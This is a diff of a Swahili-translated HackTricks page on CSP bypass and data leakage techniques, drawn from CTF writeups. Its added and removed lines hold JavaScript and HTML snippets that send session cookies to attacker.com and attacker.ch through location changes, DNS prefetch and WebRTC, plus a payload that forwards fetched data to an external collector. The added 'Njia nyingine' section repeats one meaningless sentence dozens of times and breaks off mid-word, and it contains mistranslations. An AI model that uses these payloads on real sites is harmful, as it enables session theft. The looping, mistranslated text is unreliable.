-Katika [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inapitishwa kwa kuingiza ndani ya iframe iliyoruhusiwa CSP yenye kizuizi zaidi ambayo ilikataza kupakia faili ya JS maalum ambayo, kisha, kupitia **prototype pollution** au **dom clobbering** iliruhusu kutumia hati tofauti kupakia hati ya aina yoyote.
+Katika [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inapuuzwa kwa kuingiza ndani ya fremu iliyoruhusiwa CSP inayozuia zaidi ambayo ilikataza kupakia faili maalum ya JS ambayo, kisha, kupitia **uchafuzi wa protini** au **dom clobbering** iliruhusu **kutumia skripti tofauti kupakia skripti ya kupindukia**.
 
 Unaweza **kuzuia CSP ya Iframe** kwa kutumia sifa ya **`csp`**:
 
@@ -599,17 +579,17 @@ Unaweza **kuzuia CSP ya Iframe** kwa kutumia sifa ya **`csp`**:
 ```
 {% endcode %}
 
-Katika [**hii CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** kwa **kizuia** zaidi **CSP** ili script inayozuia CSTI ilifungwa na kwa hivyo **hitilafu ikawa inaweza kudukuliwa.**\
-CSP inaweza kuwa ngumu zaidi kutumia **HTML meta tags** na inline scripts zinaweza kuzimwa **kwa kuondoa** **kuingia** kuruhusu **nonce** yao na **kuruhusu inline script maalum kupitia sha**:
+Katika [**hii CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** kurekebisha zaidi **CSP** ili script inayozuia CSTI ifungwe na hivyo **kuwezesha kutumia udhaifu.**\
+CSP inaweza kuwa ngumu zaidi kutumia **HTML meta tags** na inline scripts zinaweza kufungwa **kwa kuondoa** **ingizo** kuruhusu **nonce** yao na **kuruhusu script maalum ya inline kupitia sha**:
 ```html
 <meta http-equiv="Content-Security-Policy" content="script-src 'self'
 'unsafe-eval' 'strict-dynamic'
 'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
 'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
 ```
-### Uchunguzi wa JS na Kosa la Sera ya Usalama ya Yaliyomo (CSP) kwa Ripoti Pekee
+### Kuvuja kwa JS na Content-Security-Policy-Report-Only
 
-Ikiwa unaweza kufanikiwa kufanya seva itoe kichwa cha **`Content-Security-Policy-Report-Only`** na **thamani inayodhibitiwa na wewe** (labda kwa sababu ya CRLF), unaweza kufanya ielekeze seva yako na ikiwa **unazungusha** **yaliyomo ya JS** unayotaka kuiba na **`<script>`** na kwa sababu inawezekana sana `unsafe-inline` haijiruhusu kwa CSP, hii itasababisha **kosa la CSP** na sehemu ya skripti (yenye habari nyeti) itatumwa kwa seva kutoka kwa `Content-Security-Policy-Report-Only`.
+Ikiwa unaweza kufanikiwa kufanya seva itoe kichwa cha **`Content-Security-Policy-Report-Only`** na **thamani inayodhibitiwa na wewe** (labda kwa sababu ya CRLF), unaweza kufanya ielekeze seva yako na ikiwa **unafunga** **maudhui ya JS** unayotaka kuvuja na **`<script>`** na kwa sababu ni ya uwezekano mkubwa `unsafe-inline` haijiruhusiwi na CSP, hii italeta **kosa la CSP** na sehemu ya script (yenye habari nyeti) itatumwa kwa seva kutoka kwa `Content-Security-Policy-Report-Only`.
 
 Kwa mfano [**angalia hii CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
 
@@ -619,120 +599,122 @@ document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = documen
 ```
 ### Kuvuja Taarifa na CSP na Iframe
 
-- `Iframe` inaundwa inayoelekeza kwenye URL (tuiite `https://example.redirect.com`) ambayo imeruhusiwa na CSP.
-- URL hii kisha inaelekeza kwenye URL ya siri (kwa mfano, `https://usersecret.example2.com`) ambayo **hairuhusiwi** na CSP.
-- Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kukamata mali ya `blockedURI`. Mali hii inafichua kikoa cha URI kilichozuiwa, kuvuja kikoa cha siri ambacho URL ya awali ilielekeza.
+* `Iframe` inaundwa inayoelekeza kwa URL (tuiite `https://example.redirect.com`) ambayo imeruhusiwa na CSP.
+* URL hii kisha inaelekeza kwa URL ya siri (k.m., `https://usersecret.example2.com`) ambayo **hairuhusiwi** na CSP.
+* Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kukamata mali ya `blockedURI`. Mali hii inafichua kikoa cha URI iliyozuiwa, kuvuja kikoa cha siri ambacho URL ya awali ilielekeza.
 
-Ni muhimu kufahamu kuwa vivinjari kama Chrome na Firefox wana tabia tofauti katika kushughulikia iframes kuhusiana na CSP, ikisababisha kuvuja kwa taarifa nyeti kutokana na tabia isiyoeleweka.
+Ni muhimu kufahamu kuwa vivinjari kama Chrome na Firefox vina tabia tofauti katika kushughulikia iframes kuhusiana na CSP, ikisababisha kuvuja kwa taarifa nyeti kutokana na tabia isiyojulikana.
 
-Tekniki nyingine inahusisha kutumia CSP yenyewe kugundua subdomain ya siri. Mbinu hii inategemea algorithm ya utafutaji wa binary na kurekebisha CSP ili kuongeza vikoa maalum ambavyo vimezuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri inajumuisha herufi zisizojulikana, unaweza kujaribu subdomains tofauti kwa kubadilisha maelekezo ya CSP kuweka au kuruhusu subdomains hizi. Hapa kuna sehemu ndogo inayoonyesha jinsi CSP inaweza kuwekwa ili kurahisisha mbinu hii:
+Mbinu nyingine inahusisha kutumia CSP yenyewe kudadisi subdomain ya siri. Mbinu hii inategemea algorithm ya utafutaji wa binary na kurekebisha CSP kuingiza vikoa maalum ambavyo vimezuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri inajumuisha herufi zisizojulikana, unaweza kujaribu subdomains tofauti kwa kubadilisha maelekezo ya CSP kuzuia au kuruhusu subdomains hizi. Hapa kuna sehemu inayoonyesha jinsi CSP inavyoweza kuwekwa ili kurahisisha mbinu hii:
 ```markdown
 img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
 ```
-Kwa kufuatilia ni maombi gani yanazuiliwa au kuruhusiwa na CSP, mtu anaweza kupunguza idadi ya herufi zinazowezekana katika subdomain ya siri, hatimaye kufunua URL kamili.
+Kwa kufuatilia ni maombi gani yanazuiliwa au kuruhusiwa na CSP, mtu anaweza kupunguza idadi ya herufi zinazowezekana kwenye subdomain ya siri, hatimaye kufunua URL kamili.
 
-Mbinu zote mbili zinatumia udhaifu wa utekelezaji na tabia ya CSP katika vivinjari, kuonyesha jinsi sera zinazodhaniwa kuwa salama zinaweza kusababisha kuvuja kwa habari nyeti.
+Zote njia hutumia mianya ya utekelezaji wa CSP na tabia katika vivinjari, zikionyesha jinsi sera zenye usalama zinaweza kwa bahati mbaya kufichua taarifa nyeti.
 
 Mbinu kutoka [**hapa**](https://ctftime.org/writeup/29310).
 
 <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
 
-Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
+Jiunge na server ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kushirikiana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
 
 **Machapisho ya Udukuzi**\
-Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi
+Shiriki na maudhui yanayochimba kina kuhusu msisimko na changamoto za udukuzi
 
-**Habari za Udukuzi za Wakati Halisi**\
-Endelea kuwa na habari za ulimwengu wa udukuzi wenye kasi kupitia habari na ufahamu wa wakati halisi
+**Taarifa za Udukuzi za Wakati Halisi**\
+Endelea kufahamika na ulimwengu wa udukuzi wenye kasi kupitia taarifa na ufahamu wa wakati halisi
 
-**Matangazo ya Hivi Karibuni**\
-Baki na habari kuhusu tuzo za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
+**Matangazo ya Karibuni**\
+Baki mwelekezwa na tuzo za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
 
 **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
 
-## Teknolojia Hatari za Kupita Kizuizi cha CSP
+## Teknolojia Hatarishi za Kupita Mipangilio ya CSP
 
-### Kuzidi kwa kichupo cha majibu cha PHP
+### Kuzidisha Kifurushi cha Majibu cha PHP
 
-PHP inajulikana kwa **kuzidisha majibu hadi 4096** herufi kwa chaguomsingi. Kwa hivyo, ikiwa PHP inaonyesha onyo, kwa kutoa **data ya kutosha ndani ya onyo**, **majibu** yatakuwa **yameshawasilishwa kabla** ya **kichwa cha CSP**, kusababisha kichwa hicho kusahauliwa.\
-Kwa hiyo, mbinu inategemea kimsingi **kujaza kichupo cha majibu na onyo** ili kichwa cha CSP kisitumwe.
+PHP inajulikana kwa **kuzidisha majibu hadi herufi 4096** kwa chaguo-msingi. Kwa hivyo, ikiwa PHP inaonyesha onyo, kwa kutoa **data ya kutosha ndani ya maonyo**, **majibu** yatakuwa **yametumwa** **kabla** ya **kichwa cha CSP**, kusababisha kichwa kutozingatiwa.\
+Kisha, mbinu inategemea msingi wa **kujaza kifurushi cha majibu na maonyo** ili kichwa cha CSP kisitumwe.
 
 Wazo kutoka [**hapa**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
 
 ### Kubadilisha Ukurasa wa Hitilafu
 
-Kutoka [**hapa**](https://blog.ssrf.kr/69) inaonekana ilikuwa inawezekana kuzidi ulinzi wa CSP kwa kupakia ukurasa wa hitilafu (labda bila CSP) na kubadilisha maudhui yake.
+Kutoka [**hapa**](https://blog.ssrf.kr/69) inaonekana ilikuwa inawezekana kudukua ulinzi wa CSP kwa kupakia ukurasa wa hitilafu (labda bila CSP) na kubadilisha maudhui yake.
 ```javascript
 a = window.open('/' + 'x'.repeat(4100));
 setTimeout(function() {
 a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
 }, 1000);
 ```
-### SOME + 'self' + wordpress
+### BAADHI + 'self' + wordpress
 
-SOME ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) **katika mwisho wa ukurasa** ili **kutumia** **mwisho mwingine wa asili**. Hii inafanywa kwa kupakia mwisho ulio hatarini kutoka kwenye ukurasa wa mshambuliaji na kisha kusasisha ukurasa wa mshambuliaji kwenda kwenye mwisho halisi katika asili ile ile unayotaka kutumia vibaya. Kwa njia hii, **mwisho ulio hatarini** unaweza kutumia kitu cha **`opener`** katika **payload** ili **kufikia DOM** ya **mwisho halisi wa kutumia vibaya**. Kwa habari zaidi angalia:
+BAADHI ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) **katika mwisho wa ukurasa** kwa **kutumia** **mwisho mwingine wa asili.** Hii hufanywa kwa kupakia mwisho ulio hatarini kutoka kwa ukurasa wa mshambuliaji na kisha kusasisha ukurasa wa mshambuliaji kwa mwisho halisi katika asili ile ile unayotaka kutumia. Kwa njia hii **mwisho ulio hatarini** unaweza kutumia kitu cha **`opener`** katika **mzigo** kufikia DOM ya **mwisho halisi wa kutumia**. Kwa habari zaidi angalia:
 
 {% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %}
 [some-same-origin-method-execution.md](../xss-cross-site-scripting/some-same-origin-method-execution.md)
 {% endcontent-ref %}
 
-Zaidi ya hayo, **wordpress** ina mwisho wa **JSONP** katika `/wp-json/wp/v2/users/1?_jsonp=data` ambao utaonyesha **data** iliyotumwa kwenye matokeo (kwa kikomo cha herufi, nambari na alama za kipindi tu).
+Zaidi ya hayo, **wordpress** ina mwisho wa **JSONP** katika `/wp-json/wp/v2/users/1?_jsonp=data` ambao uta**rejea** **data** iliyotumwa kwenye matokeo (ikiwa na kikomo cha herufi, nambari na madokezo).
 
-Mshambuliaji anaweza kutumia mwisho huo ku **fanya shambulio la SOME** dhidi ya WordPress na **kulijumuisha** ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kuwa **script** hii itakuwa **imepakia** kwa sababu inaruhusiwa na 'self'. Zaidi ya hayo, na kwa kuwa WordPress imefungwa, mshambuliaji anaweza kutumia **shambulio la SOME** kupitia mwisho **ulio hatarini** wa **kurejelea** ambao **unapitisha CSP** ili kumpa mtumiaji mamlaka zaidi, kusakinisha programu-jalizi mpya...
-Kwa habari zaidi juu ya jinsi ya kutekeleza shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
+Mshambuliaji anaweza kutumia mwisho huo kufanya **shambulio la BAADHI** dhidi ya WordPress na **kulenga** ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kuwa **script** hii ita**pakia** kwa sababu imeruhusiwa na 'self'. Zaidi ya hayo, na kwa sababu WordPress imefungwa, mshambuliaji anaweza kutumia **shambulio la BAADHI** kupitia mwisho wa **kupigia** **simu** ulio hatarini ambao **unapita** CSP kutoa mamlaka zaidi kwa mtumiaji, kusakinisha programu jalizi mpya...\
+Kwa habari zaidi kuhusu jinsi ya kutekeleza shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
 
-## Mbinu za Kupitisha CSP ya Kuvuja
+## Kupita Kizuizi cha CSP cha Kufichua
 
-Ikiwa kuna CSP kali ambayo haiwezi kukuruhusu **kuingiliana na seva za nje**, kuna mambo kadhaa ambayo unaweza kufanya daima ili kuvuja habari.
+Ikiwa kuna CSP kali ambayo haikuruhusu **kuingiliana na seva za nje**, kuna mambo ambayo unaweza kufanya daima kufichua habari.
 
-### Location
+### Mahali
 
-Unaweza tu kusasisha eneo ili kutuma habari za siri kwenye seva ya mshambuliaji:
+Unaweza tu kusasisha mahali pa kutuma habari za siri kwa seva ya mshambuliaji:
 ```javascript
 var sessionid = document.cookie.split('=')[1]+".";
 document.location = "https://attacker.com/?" + sessionid;
 ```
 ### Lebo ya Meta
 
-Unaweza kuendelekeza kwa kuingiza lebo ya meta (hii ni tu kuendelekeza, haitafichua maudhui)
+Unaweza kuelekeza kwa kuingiza lebo ya meta (hii ni tu kuelekeza, haitavuja maudhui)
 ```html
 <meta http-equiv="refresh" content="1; http://attacker.com">
 ```
 ### DNS Prefetch
 
-Ili kupakia kurasa haraka, vivinjari hupenda kutatua majina ya mwenyeji kuwa anwani za IP mapema na kuzihifadhi kwa matumizi ya baadaye.\
-Unaweza kuashiria kivinjari kutatua majina ya mwenyeji mapema na: `<link reol="dns-prefetch" href="kitu.com">`
+Ili kupakia kurasa haraka, vivinjari vitahakikisha kutatua majina ya mwenyeji kuwa anwani za IP na kuzihifadhi kwa matumizi ya baadaye.\
+Unaweza kuashiria kivinjari kutatua mwenyeji mapema na: `<link reol="dns-prefetch" href="kitu.com">`
 
-Unaweza kutumia tabia hii kwa **kuvuja taarifa nyeti kupitia ombi za DNS**:
+Unaweza kutumia tabia hii kwa **kutolea nje taarifa nyeti kupitia maombi ya DNS**:
 ```javascript
 var sessionid = document.cookie.split('=')[1]+".";
 var body = document.getElementsByTagName('body')[0];
 body.innerHTML = body.innerHTML + "<link rel=\"dns-prefetch\" href=\"//" + sessionid + "attacker.ch\">";
 ```
-Njia nyingine:
+### Njia nyingine:
+
+Unaweza kutumia njia ya kuficha maudhui ya kuki za kikoa kwa kutumia kichwa cha kuki za kikoa. Hii inaweza kusababisha kuki za kikoa kutowekwa kwa njia sahihi na kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusababisha kuki za kikoa kutotumika kwa njia iliyokusudiwa. Hii inaweza kusabab
 ```javascript
 const linkEl = document.createElement('link');
 linkEl.rel = 'prefetch';
 linkEl.href = urlWithYourPreciousData;
 document.head.appendChild(linkEl);
 ```
-Ili kuepuka hili lisitokee, server inaweza kutuma kichwa cha HTTP:
+Ili kuepuka hili lisitokee, server inaweza kutuma HTTP header:
 ```
 X-DNS-Prefetch-Control: off
 ```
 {% hint style="info" %}
-Inaonekana, mbinu hii haifanyi kazi kwenye vivinjari visivyo na kichwa (bots)
+Inavyoonekana, mbinu hii haifanyi kazi katika vivinjari visivyo na kichwa (bots)
 {% endhint %}
 
 ### WebRTC
 
-Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haichunguzi sera ya `connect-src`** ya CSP.
+Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haitathmini sera ya `connect-src`** ya CSP.
 
-Kwa kweli, unaweza _kuvuja_ taarifa kwa kutumia _ombi la DNS_. Angalia nambari hii:
+Kwa kweli unaweza _kuvuja_ taarifa kwa kutumia _ombi la DNS_. Angalia nambari hii:
 ```javascript
 (async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
 ```
-Chaguo lingine:
+Njia nyingine:
 ```javascript
 var pc = new RTCPeerConnection({
 "iceServers":[
@@ -744,12 +726,12 @@ var pc = new RTCPeerConnection({
 });
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
-## Ukaguzi wa Sera za CSP Mkondoni
+## Kuangalia Sera za CSP Mkondoni
 
 * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
 * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
 
-## Kuunda CSP kiotomatiki
+## Kujenga CSP Kiotomatiki
 
 [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
 
@@ -763,21 +745,20 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 * [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/)
 * [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
 
-
 ​
 
 <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
 
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa bug bounty!
+Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
 
 **Machapisho ya Udukuzi**\
-Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi
+Shiriki na maudhui yanayochimba kina kuhusu udukuzi
 
-**Habari za Udukuzi za Wakati Halisi**\
-Kuwa na habari za hivi karibuni za ulimwengu wa udukuzi kupitia habari na ufahamu wa wakati halisi
+**Taarifa za Udukuzi za Wakati Halisi**\
+Kaa up-to-date na ulimwengu wa udukuzi wenye kasi kupitia habari za wakati halisi na ufahamu
 
-**Matangazo ya Hivi Karibuni**\
-Endelea kuwa na habari kuhusu bug bounty mpya zinazozinduliwa na sasisho muhimu za jukwaa
+**Matangazo ya Karibuni**\
+Baki mwelekezi na tuzo mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
 
 **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
 
@@ -787,10 +768,10 @@ Endelea kuwa na habari kuhusu bug bounty mpya zinazozinduliwa na sasisho muhimu
 
 Njia nyingine za kusaidia HackTricks:
 
-* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
-* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
-* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
-* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
+* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
+* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
+* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>